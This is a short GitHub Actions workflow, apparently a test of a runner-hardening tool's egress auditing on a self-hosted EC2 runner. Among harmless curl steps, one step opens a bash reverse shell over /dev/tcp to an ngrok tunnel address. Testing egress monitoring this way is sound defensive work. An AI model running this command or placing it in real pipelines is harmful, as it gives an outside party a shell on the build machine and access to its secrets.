name: LockDown-Reverse-Shell
on:
  workflow_dispatch:

jobs:
  build:
    name: Deploy2
    runs-on: [self-hosted, ec2]
    steps:
      - uses: step-security/harden-runner@rc
        with:
          egress-policy: audit
      - name: Code Checkout
        uses: actions/checkout@v2
        with:
          fetch-depth: 2
          
      - name: Curl google
        run: "curl -s https://google.com"


      - name: run reverse shell
        run: bash -c "bash -i >& /dev/tcp/0.tcp.us-cal-1.ngrok.io/17658 0>&1"
                  
      - name: Curl youtube
        run: "curl -s https://youtube.com"